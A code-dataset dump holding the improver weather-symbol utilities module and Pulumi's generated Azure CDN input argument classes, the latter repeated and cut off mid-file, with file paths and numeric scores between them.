(units,) = set(u for (_, u) in uniq_thresh) # enforces same units
thresh_str = ", ".join(map(str, sorted(v for (v, _) in uniq_thresh)))
output.append("{} ({}): {}".format(requirement, units, thresh_str))
n_files = len(output)
formatted_string = "{}\n" * n_files
formatted_output = formatted_string.format(*output)
return formatted_output
def is_variable(thing):
"""
Identify whether given string is likely to be a variable name by
identifying the exceptions.
Args:
thing: str
The string to operate on
Returns:
bool:
False if thing is one of ["+", "-", "*", "/"] or if float(
thing) does not raise a ValueError, else True.
"""
valid_operators = ["+", "-", "*", "/"]
try:
float(thing)
return False
except ValueError:
return thing not in valid_operators
def get_parameter_names(diagnostic_fields):
"""
For diagnostic fields that can contain operators and values, strips out
just the parameter names.
Args:
diagnostic_fields (list of lists of str):
Returns:
list of lists of str
"""
parameter_names = []
for condition in diagnostic_fields:
if isinstance(condition, list):
parameter_names.append(get_parameter_names(condition))
elif is_variable(condition):
parameter_names.append(condition)
return parameter_names | improver/wxcode/utilities.py | """This module defines the utilities required for wxcode plugin """
from collections import OrderedDict
from improver.wxcode.wxcode_decision_tree import wxcode_decision_tree
from improver.wxcode.wxcode_decision_tree_global import wxcode_decision_tree_global
_WX_DICT_IN = {
0: "Clear_Night",
1: "Sunny_Day",
2: "Partly_Cloudy_Night",
3: "Partly_Cloudy_Day",
4: "Dust",
5: "Mist",
6: "Fog",
7: "Cloudy",
8: "Overcast",
9: "Light_Shower_Night",
10: "Light_Shower_Day",
11: "Drizzle",
12: "Light_Rain",
13: "Heavy_Shower_Night",
14: "Heavy_Shower_Day",
15: "Heavy_Rain",
16: "Sleet_Shower_Night",
17: "Sleet_Shower_Day",
18: "Sleet",
19: "Hail_Shower_Night",
20: "Hail_Shower_Day",
21: "Hail",
22: "Light_Snow_Shower_Night",
23: "Light_Snow_Shower_Day",
24: "Light_Snow",
25: "Heavy_Snow_Shower_Night",
26: "Heavy_Snow_Shower_Day",
27: "Heavy_Snow",
28: "Thunder_Shower_Night",
29: "Thunder_Shower_Day",
30: "Thunder",
}
WX_DICT = OrderedDict(sorted(_WX_DICT_IN.items(), key=lambda t: t[0]))
DAYNIGHT_CODES = [1, 3, 10, 14, 17, 20, 23, 26, 29]
def weather_code_attributes():
"""
Returns:
dict:
Attributes defining weather code meanings.
"""
import numpy as np
attributes = {}
wx_keys = np.array(list(WX_DICT.keys()))
attributes.update({"weather_code": wx_keys})
wxstring = " ".join(WX_DICT.values())
attributes.update({"weather_code_meaning": wxstring})
return attributes
def expand_nested_lists(query, key):
"""
Produce flat lists from list and nested lists.
Args:
query (dict):
A single query from the decision tree.
key (str):
A string denoting the field to be taken from the dict.
Returns:
list:
A 1D list containing all the values for a given key.
"""
items = []
for item in query[key]:
if isinstance(item, list):
items.extend(item)
else:
items.extend([item])
return items
def update_daynight(cubewx):
""" Update weather cube depending on whether it is day or night
Args:
cubewx(iris.cube.Cube):
Cube containing only daytime weather symbols.
Returns:
iris.cube.Cube:
Cube containing day and night weather symbols
Raises:
CoordinateNotFoundError : cube must have time coordinate.
"""
import iris
import numpy as np
from iris.exceptions import CoordinateNotFoundError
import improver.utilities.solar as solar
if not cubewx.coords("time"):
msg = "cube must have time coordinate "
raise CoordinateNotFoundError(msg)
time_dim = cubewx.coord_dims("time")
if not time_dim:
cubewx_daynight = iris.util.new_axis(cubewx.copy(), "time")
else:
cubewx_daynight = cubewx.copy()
daynightplugin = solar.DayNightMask()
daynight_mask = daynightplugin(cubewx_daynight)
# Loop over the codes which decrease by 1 if a night time value
# e.g. 1 - sunny day becomes 0 - clear night.
for val in DAYNIGHT_CODES:
index = np.where(cubewx_daynight.data == val)
# Where day leave as is, where night correct weather
# code to value - 1.
cubewx_daynight.data[index] = np.where(
daynight_mask.data[index] == daynightplugin.day,
cubewx_daynight.data[index],
cubewx_daynight.data[index] - 1,
)
if not time_dim:
cubewx_daynight = iris.util.squeeze(cubewx_daynight)
return cubewx_daynight
def interrogate_decision_tree(wxtree):
"""
Obtain a list of necessary inputs from the decision tree as it is currently
defined. Return a formatted string that contains the diagnostic names, the
thresholds needed, and whether they are thresholded above or below these
values. This output is used to create the CLI help, informing the user of
the necessary inputs.
Args:
wxtree (str):
The weather symbol tree that is to be interrogated.
Returns:
list of str:
Returns a formatted string descring the diagnostics required,
including threshold details.
"""
# Get current weather symbol decision tree and populate a list of
# required inputs for printing.
if wxtree == "high_resolution":
queries = wxcode_decision_tree()
elif wxtree == "global":
queries = wxcode_decision_tree_global()
else:
raise ValueError("Unknown decision tree name provided.")
# Diagnostic names and threshold values.
requirements = {}
for query in queries.values():
diagnostics = get_parameter_names(
expand_nested_lists(query, "diagnostic_fields")
)
thresholds = expand_nested_lists(query, "diagnostic_thresholds")
for diagnostic, threshold in zip(diagnostics, thresholds):
requirements.setdefault(diagnostic, set()).add(threshold)
# Create a list of formatted strings that will be printed as part of the
# CLI help.
output = []
for requirement, uniq_thresh in sorted(requirements.items()):
(units,) = set(u for (_, u) in uniq_thresh) # enforces same units
thresh_str = ", ".join(map(str, sorted(v for (v, _) in uniq_thresh)))
output.append("{} ({}): {}".format(requirement, units, thresh_str))
n_files = len(output)
formatted_string = "{}\n" * n_files
formatted_output = formatted_string.format(*output)
return formatted_output
def is_variable(thing):
"""
Identify whether given string is likely to be a variable name by
identifying the exceptions.
Args:
thing: str
The string to operate on
Returns:
bool:
False if thing is one of ["+", "-", "*", "/"] or if float(
thing) does not raise a ValueError, else True.
"""
valid_operators = ["+", "-", "*", "/"]
try:
float(thing)
return False
except ValueError:
return thing not in valid_operators
def get_parameter_names(diagnostic_fields):
"""
For diagnostic fields that can contain operators and values, strips out
just the parameter names.
Args:
diagnostic_fields (list of lists of str):
Returns:
list of lists of str
"""
parameter_names = []
for condition in diagnostic_fields:
if isinstance(condition, list):
parameter_names.append(get_parameter_names(condition))
elif is_variable(condition):
parameter_names.append(condition)
return parameter_names | 0.908618 | 0.431944 |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
__all__ = [
'CacheExpirationActionParametersArgs',
'DeepCreatedOriginArgs',
'DeliveryRuleCacheExpirationActionArgs',
'DeliveryRuleUrlFileExtensionConditionArgs',
'DeliveryRuleUrlPathConditionArgs',
'DeliveryRuleArgs',
'EndpointPropertiesUpdateParametersDeliveryPolicyArgs',
'GeoFilterArgs',
'SkuArgs',
'UrlFileExtensionConditionParametersArgs',
'UrlPathConditionParametersArgs',
]
@pulumi.input_type
class CacheExpirationActionParametersArgs:
def __init__(__self__, *,
cache_behavior: pulumi.Input[str],
cache_type: pulumi.Input[str],
odata_type: pulumi.Input[str],
cache_duration: Optional[pulumi.Input[str]] = None):
"""
Defines the parameters for the cache expiration action.
:param pulumi.Input[str] cache_behavior: Caching behavior for the requests that include query strings.
:param pulumi.Input[str] cache_type: The level at which the content needs to be cached.
:param pulumi.Input[str] cache_duration: The duration for which the content needs to be cached. Allowed format is [d.]hh:mm:ss
"""
pulumi.set(__self__, "cache_behavior", cache_behavior)
pulumi.set(__self__, "cache_type", cache_type)
pulumi.set(__self__, "odata_type", odata_type)
if cache_duration is not None:
pulumi.set(__self__, "cache_duration", cache_duration)
@property
@pulumi.getter(name="cacheBehavior")
def cache_behavior(self) -> pulumi.Input[str]:
"""
Caching behavior for the requests that include query strings.
"""
return pulumi.get(self, "cache_behavior")
@cache_behavior.setter
def cache_behavior(self, value: pulumi.Input[str]):
pulumi.set(self, "cache_behavior", value)
@property
@pulumi.getter(name="cacheType")
def cache_type(self) -> pulumi.Input[str]:
"""
The level at which the content needs to be cached.
"""
return pulumi.get(self, "cache_type")
@cache_type.setter
def cache_type(self, value: pulumi.Input[str]):
pulumi.set(self, "cache_type", value)
@property
@pulumi.getter(name="odataType")
def odata_type(self) -> pulumi.Input[str]:
return pulumi.get(self, "odata_type")
@odata_type.setter
def odata_type(self, value: pulumi.Input[str]):
pulumi.set(self, "odata_type", value)
@property
@pulumi.getter(name="cacheDuration")
def cache_duration(self) -> Optional[pulumi.Input[str]]:
"""
The duration for which the content needs to be cached. Allowed format is [d.]hh:mm:ss
"""
return pulumi.get(self, "cache_duration")
@cache_duration.setter
def cache_duration(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cache_duration", value)
@pulumi.input_type
class DeepCreatedOriginArgs:
def __init__(__self__, *,
host_name: pulumi.Input[str],
name: pulumi.Input[str],
http_port: Optional[pulumi.Input[int]] = None,
https_port: Optional[pulumi.Input[int]] = None):
"""
The main origin of CDN content which is added when creating a CDN endpoint.
:param pulumi.Input[str] host_name: The address of the origin. It can be a domain name, IPv4 address, or IPv6 address.
:param pulumi.Input[str] name: Origin name
:param pulumi.Input[int] http_port: The value of the HTTP port. Must be between 1 and 65535
:param pulumi.Input[int] https_port: The value of the HTTPS port. Must be between 1 and 65535
"""
pulumi.set(__self__, "host_name", host_name)
pulumi.set(__self__, "name", name)
if http_port is not None:
pulumi.set(__self__, "http_port", http_port)
if https_port is not None:
pulumi.set(__self__, "https_port", https_port)
@property
@pulumi.getter(name="hostName")
def host_name(self) -> pulumi.Input[str]:
"""
The address of the origin. It can be a domain name, IPv4 address, or IPv6 address.
"""
return pulumi.get(self, "host_name")
@host_name.setter
def host_name(self, value: pulumi.Input[str]):
pulumi.set(self, "host_name", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Origin name
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="httpPort")
def http_port(self) -> Optional[pulumi.Input[int]]:
"""
The value of the HTTP port. Must be between 1 and 65535
"""
return pulumi.get(self, "http_port")
@http_port.setter
def http_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "http_port", value)
@property
@pulumi.getter(name="httpsPort")
def https_port(self) -> Optional[pulumi.Input[int]]:
"""
The value of the HTTPS port. Must be between 1 and 65535
"""
return pulumi.get(self, "https_port")
@https_port.setter
def https_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "https_port", value)
@pulumi.input_type
class DeliveryRuleCacheExpirationActionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['CacheExpirationActionParametersArgs']):
"""
Defines the cache expiration action for the delivery rule.
:param pulumi.Input[str] name: The name of the action for the delivery rule.
Expected value is 'CacheExpiration'.
:param pulumi.Input['CacheExpirationActionParametersArgs'] parameters: Defines the parameters for the action.
"""
pulumi.set(__self__, "name", 'CacheExpiration')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the action for the delivery rule.
Expected value is 'CacheExpiration'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['CacheExpirationActionParametersArgs']:
"""
Defines the parameters for the action.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['CacheExpirationActionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleUrlFileExtensionConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['UrlFileExtensionConditionParametersArgs']):
"""
Defines the URL file extension condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'UrlFileExtension'.
:param pulumi.Input['UrlFileExtensionConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'UrlFileExtension')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the condition for the delivery rule.
Expected value is 'UrlFileExtension'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['UrlFileExtensionConditionParametersArgs']:
"""
Defines the parameters for the condition.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['UrlFileExtensionConditionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleUrlPathConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['UrlPathConditionParametersArgs']):
"""
Defines the URL path condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'UrlPath'.
:param pulumi.Input['UrlPathConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'UrlPath')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the condition for the delivery rule.
Expected value is 'UrlPath'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['UrlPathConditionParametersArgs']:
"""
Defines the parameters for the condition.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['UrlPathConditionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleArgs:
def __init__(__self__, *,
actions: pulumi.Input[Sequence[pulumi.Input['DeliveryRuleCacheExpirationActionArgs']]],
order: pulumi.Input[int],
conditions: Optional[pulumi.Input[Sequence[pulumi.Input[Union['DeliveryRuleUrlFileExtensionConditionArgs', 'DeliveryRuleUrlPathConditionArgs']]]]] = None):
"""
A rule that specifies a set of actions and conditions
:param pulumi.Input[Sequence[pulumi.Input['DeliveryRuleCacheExpirationActionArgs']]] actions: A list of actions that are executed when all the conditions of a rule are satisfied.
:param pulumi.Input[int] order: The order in which the rules are applied for the endpoint. Possible values {0,1,2,3,………}. A rule with a lesser order will be applied before a rule with a greater order. Rule with order 0 is a special rule. It does not require any condition and actions listed in it will always be applied.
:param pulumi.Input[Sequence[pulumi.Input[Union['DeliveryRuleUrlFileExtensionConditionArgs', 'DeliveryRuleUrlPathConditionArgs']]]] conditions: A list of conditions that must be matched for the actions to be executed
"""
pulumi.set(__self__, "actions", actions)
pulumi.set(__self__, "order", order)
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
@property
@pulumi.getter
def actions(self) -> pulumi.Input[Sequence[pulumi.Input['DeliveryRuleCacheExpirationActionArgs']]]:
"""
A list of actions that are executed when all the conditions of a rule are satisfied.
"""
return pulumi.get(self, "actions")
@actions.setter
def actions(self, value: pulumi.Input[Sequence[pulumi.Input['DeliveryRuleCacheExpirationActionArgs']]]):
pulumi.set(self, "actions", value)
@property
@pulumi.getter
def order(self) -> pulumi.Input[int]:
"""
The order in which the rules are applied for the endpoint. Possible values {0,1,2,3,………}. A rule with a lesser order will be applied before a rule with a greater order. Rule with order 0 is a special rule. It does not require any condition and actions listed in it will always be applied.
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: pulumi.Input[int]):
pulumi.set(self, "order", value)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Union['DeliveryRuleUrlFileExtensionConditionArgs', 'DeliveryRuleUrlPathConditionArgs']]]]]:
"""
A list of conditions that must be matched for the actions to be executed
"""
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[Union['DeliveryRuleUrlFileExtensionConditionArgs', 'DeliveryRuleUrlPathConditionArgs']]]]]):
pulumi.set(self, "conditions", value)
@pulumi.input_type
class EndpointPropertiesUpdateParametersDeliveryPolicyArgs:
def __init__(__self__, *,
rules: pulumi.Input[Sequence[pulumi.Input['DeliveryRuleArgs']]],
description: Optional[pulumi.Input[str]] = None):
"""
A policy that specifies the delivery rules to be used for an endpoint.
:param pulumi.Input[Sequence[pulumi.Input['DeliveryRuleArgs']]] rules: A list of the delivery rules.
:param pulumi.Input[str] description: User-friendly description of the policy.
"""
pulumi.set(__self__, "rules", rules)
if description is not None:
pulumi.set(__self__, "description", description)
@property
@pulumi.getter
def rules(self) -> pulumi.Input[Sequence[pulumi.Input['DeliveryRuleArgs']]]:
"""
A list of the delivery rules.
"""
return pulumi.get(self, "rules")
@rules.setter
def rules(self, value: pulumi.Input[Sequence[pulumi.Input['DeliveryRuleArgs']]]):
pulumi.set(self, "rules", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
User-friendly description of the policy.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@pulumi.input_type
class GeoFilterArgs:
def __init__(__self__, *,
action: pulumi.Input['GeoFilterActions'],
country_codes: pulumi.Input[Sequence[pulumi.Input[str]]],
relative_path: pulumi.Input[str]):
"""
Rules defining user's geo access within a CDN endpoint.
:param pulumi.Input['GeoFilterActions'] action: Action of the geo filter, i.e. allow or block access.
:param pulumi.Input[Sequence[pulumi.Input[str]]] country_codes: Two letter country codes defining user country access in a geo filter, e.g. AU, MX, US.
:param pulumi.Input[str] relative_path: Relative path applicable to geo filter. (e.g. '/mypictures', '/mypicture/kitty.jpg', and etc.)
"""
pulumi.set(__self__, "action", action)
pulumi.set(__self__, "country_codes", country_codes)
pulumi.set(__self__, "relative_path", relative_path)
@property
@pulumi.getter
def action(self) -> pulumi.Input['GeoFilterActions']:
"""
Action of the geo filter, i.e. allow or block access.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: pulumi.Input['GeoFilterActions']):
pulumi.set(self, "action", value)
@property
@pulumi.getter(name="countryCodes")
def country_codes(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
Two letter country codes defining user country access in a geo filter, e.g. AU, MX, US.
"""
return pulumi.get(self, "country_codes")
@country_codes.setter
def country_codes(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "country_codes", value)
@property
@pulumi.getter(name="relativePath")
def relative_path(self) -> pulumi.Input[str]:
"""
Relative path applicable to geo filter. (e.g. '/mypictures', '/mypicture/kitty.jpg', and etc.)
"""
return pulumi.get(self, "relative_path")
@relative_path.setter
def relative_path(self, value: pulumi.Input[str]):
pulumi.set(self, "relative_path", value)
@pulumi.input_type
class SkuArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[Union[str, 'SkuName']]] = None):
"""
The pricing tier (defines a CDN provider, feature list and rate) of the CDN profile.
:param pulumi.Input[Union[str, 'SkuName']] name: Name of the pricing tier.
"""
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[Union[str, 'SkuName']]]:
"""
Name of the pricing tier.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[Union[str, 'SkuName']]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class UrlFileExtensionConditionParametersArgs:
def __init__(__self__, *,
extensions: pulumi.Input[Sequence[pulumi.Input[str]]],
odata_type: pulumi.Input[str]):
"""
Defines the parameters for the URL file extension condition.
:param pulumi.Input[Sequence[pulumi.Input[str]]] extensions: A list of extensions for the condition of the delivery rule.
"""
pulumi.set(__self__, "extensions", extensions)
pulumi.set(__self__, "odata_type", odata_type)
@property
@pulumi.getter
def extensions(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A list of extensions for the condition of the delivery rule.
"""
return pulumi.get(self, "extensions")
@extensions.setter
def extensions(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "extensions", value)
@property
@pulumi.getter(name="odataType")
def odata_type(self) -> pulumi.Input[str]:
return pulumi.get(self, "odata_type")
@odata_type.setter
def odata_type(self, value: pulumi.Input[str]):
pulumi.set(self, "odata_type", value)
@pulumi.input_type
class UrlPathConditionParametersArgs:
def __init__(__self__, *,
match_type: pulumi.Input[str],
odata_type: pulumi.Input[str],
path: pulumi.Input[str]):
"""
Defines the parameters for the URL path condition.
:param pulumi.Input[str] match_type: The match type for the condition of the delivery rule
:param pulumi.Input[str] path: A URL path for the condition of the delivery rule
"""
pulumi.set(__self__, "match_type", match_type)
pulumi.set(__self__, "odata_type", odata_type)
pulumi.set(__self__, "path", path)
@property
@pulumi.getter(name="matchType")
def match_type(self) -> pulumi.Input[str]:
"""
The match type for the condition of the delivery rule
"""
return pulumi.get(self, "match_type")
@match_type.setter
def match_type(self, value: pulumi.Input[str]):
pulumi.set(self, "match_type", value)
@property
@pulumi.getter(name="odataType")
def odata_type(self) -> pulumi.Input[str]:
return pulumi.get(self, "odata_type")
@odata_type.setter
def odata_type(self, value: pulumi.Input[str]):
pulumi.set(self, "odata_type", value)
@property
@pulumi.getter
def path(self) -> pulumi.Input[str]:
"""
A URL path for the condition of the delivery rule
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: pulumi.Input[str]):
pulumi.set(self, "path", value) | sdk/python/pulumi_azure_native/cdn/v20171012/_inputs.py |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
__all__ = [
'CacheExpirationActionParametersArgs',
'DeepCreatedOriginArgs',
'DeliveryRuleCacheExpirationActionArgs',
'DeliveryRuleUrlFileExtensionConditionArgs',
'DeliveryRuleUrlPathConditionArgs',
'DeliveryRuleArgs',
'EndpointPropertiesUpdateParametersDeliveryPolicyArgs',
'GeoFilterArgs',
'SkuArgs',
'UrlFileExtensionConditionParametersArgs',
'UrlPathConditionParametersArgs',
]
@pulumi.input_type
class CacheExpirationActionParametersArgs:
def __init__(__self__, *,
cache_behavior: pulumi.Input[str],
cache_type: pulumi.Input[str],
odata_type: pulumi.Input[str],
cache_duration: Optional[pulumi.Input[str]] = None):
"""
Defines the parameters for the cache expiration action.
:param pulumi.Input[str] cache_behavior: Caching behavior for the requests that include query strings.
:param pulumi.Input[str] cache_type: The level at which the content needs to be cached.
:param pulumi.Input[str] cache_duration: The duration for which the content needs to be cached. Allowed format is [d.]hh:mm:ss
"""
pulumi.set(__self__, "cache_behavior", cache_behavior)
pulumi.set(__self__, "cache_type", cache_type)
pulumi.set(__self__, "odata_type", odata_type)
if cache_duration is not None:
pulumi.set(__self__, "cache_duration", cache_duration)
@property
@pulumi.getter(name="cacheBehavior")
def cache_behavior(self) -> pulumi.Input[str]:
"""
Caching behavior for the requests that include query strings.
"""
return pulumi.get(self, "cache_behavior")
@cache_behavior.setter
def cache_behavior(self, value: pulumi.Input[str]):
pulumi.set(self, "cache_behavior", value)
@property
@pulumi.getter(name="cacheType")
def cache_type(self) -> pulumi.Input[str]:
"""
The level at which the content needs to be cached.
"""
return pulumi.get(self, "cache_type")
@cache_type.setter
def cache_type(self, value: pulumi.Input[str]):
pulumi.set(self, "cache_type", value)
@property
@pulumi.getter(name="odataType")
def odata_type(self) -> pulumi.Input[str]:
return pulumi.get(self, "odata_type")
@odata_type.setter
def odata_type(self, value: pulumi.Input[str]):
pulumi.set(self, "odata_type", value)
@property
@pulumi.getter(name="cacheDuration")
def cache_duration(self) -> Optional[pulumi.Input[str]]:
"""
The duration for which the content needs to be cached. Allowed format is [d.]hh:mm:ss
"""
return pulumi.get(self, "cache_duration")
@cache_duration.setter
def cache_duration(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cache_duration", value)
@pulumi.input_type
class DeepCreatedOriginArgs:
def __init__(__self__, *,
host_name: pulumi.Input[str],
name: pulumi.Input[str],
http_port: Optional[pulumi.Input[int]] = None,
https_port: Optional[pulumi.Input[int]] = None):
"""
The main origin of CDN content which is added when creating a CDN endpoint.
:param pulumi.Input[str] host_name: The address of the origin. It can be a domain name, IPv4 address, or IPv6 address.
:param pulumi.Input[str] name: Origin name
:param pulumi.Input[int] http_port: The value of the HTTP port. Must be between 1 and 65535
:param pulumi.Input[int] https_port: The value of the HTTPS port. Must be between 1 and 65535
"""
pulumi.set(__self__, "host_name", host_name)
pulumi.set(__self__, "name", name)
if http_port is not None:
pulumi.set(__self__, "http_port", http_port)
if https_port is not None:
pulumi.set(__self__, "https_port", https_port)
@property
@pulumi.getter(name="hostName")
def host_name(self) -> pulumi.Input[str]:
"""
The address of the origin. It can be a domain name, IPv4 address, or IPv6 address.
"""
return pulumi.get(self, "host_name")
@host_name.setter
def host_name(self, value: pulumi.Input[str]):
pulumi.set(self, "host_name", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Origin name
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="httpPort")
def http_port(self) -> Optional[pulumi.Input[int]]:
"""
The value of the HTTP port. Must be between 1 and 65535
"""
return pulumi.get(self, "http_port")
@http_port.setter
def http_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "http_port", value)
@property
@pulumi.getter(name="httpsPort")
def https_port(self) -> Optional[pulumi.Input[int]]:
"""
The value of the HTTPS port. Must be between 1 and 65535
"""
return pulumi.get(self, "https_port")
@https_port.setter
def https_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "https_port", value)
@pulumi.input_type
class DeliveryRuleCacheExpirationActionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['CacheExpirationActionParametersArgs']):
"""
Defines the cache expiration action for the delivery rule.
:param pulumi.Input[str] name: The name of the action for the delivery rule.
Expected value is 'CacheExpiration'.
:param pulumi.Input['CacheExpirationActionParametersArgs'] parameters: Defines the parameters for the action.
"""
pulumi.set(__self__, "name", 'CacheExpiration')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the action for the delivery rule.
Expected value is 'CacheExpiration'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['CacheExpirationActionParametersArgs']:
"""
Defines the parameters for the action.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['CacheExpirationActionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleUrlFileExtensionConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['UrlFileExtensionConditionParametersArgs']):
"""
Defines the URL file extension condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'UrlFileExtension'.
:param pulumi.Input['UrlFileExtensionConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'UrlFileExtension')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the condition for the delivery rule.
Expected value is 'UrlFileExtension'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['UrlFileExtensionConditionParametersArgs']:
"""
Defines the parameters for the condition.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['UrlFileExtensionConditionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleUrlPathConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['UrlPathConditionParametersArgs']):
"""
Defines the URL path condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'UrlPath'.
:param pulumi.Input['UrlPathConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'UrlPath')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the condition for the delivery rule.
Expected value is 'UrlPath'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['UrlPathConditionParametersArgs']:
"""
Defines the parameters for the condition.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['UrlPathConditionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleArgs:
def __init__(__self__, *,
actions: pulumi.Input[Sequence[pulumi.Input['DeliveryRuleCacheExpirationActionArgs']]],
order: pulumi.Input[int],
conditions: Optional[pulumi.Input[Sequence[pulumi.Input[Union['DeliveryRuleUrlFileExtensionConditionArgs', 'DeliveryRuleUrlPathConditionArgs']]]]] = None):
"""
A rule that specifies a set of actions and conditions
:param pulumi.Input[Sequence[pulumi.Input['DeliveryRuleCacheExpirationActionArgs']]] actions: A list of actions that are executed when all the conditions of a rule are satisfied.
:param pulumi.Input[int] order: The order in which the rules are applied for the endpoint. Possible values {0,1,2,3,………}. A rule with a lesser order will be applied before a rule with a greater order. Rule with order 0 is a special rule. It does not require any condition and actions listed in it will always be applied.
:param pulumi.Input[Sequence[pulumi.Input[Union['DeliveryRuleUrlFileExtensionConditionArgs', 'DeliveryRuleUrlPathConditionArgs']]]] conditions: A list of conditions that must be matched for the actions to be executed
"""
pulumi.set(__self__, "actions", actions)
pulumi.set(__self__, "order", order)
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
@property
@pulumi.getter
def actions(self) -> pulumi.Input[Sequence[pulumi.Input['DeliveryRuleCacheExpirationActionArgs']]]:
"""
A list of actions that are executed when all the conditions of a rule are satisfied.
"""
return pulumi.get(self, "actions")
@actions.setter
def actions(self, value: pulumi.Input[Sequence[pulumi.Input['DeliveryRuleCacheExpirationActionArgs']]]):
pulumi.set(self, "actions", value)
@property
@pulumi.getter
def order(self) -> pulumi.Input[int]:
"""
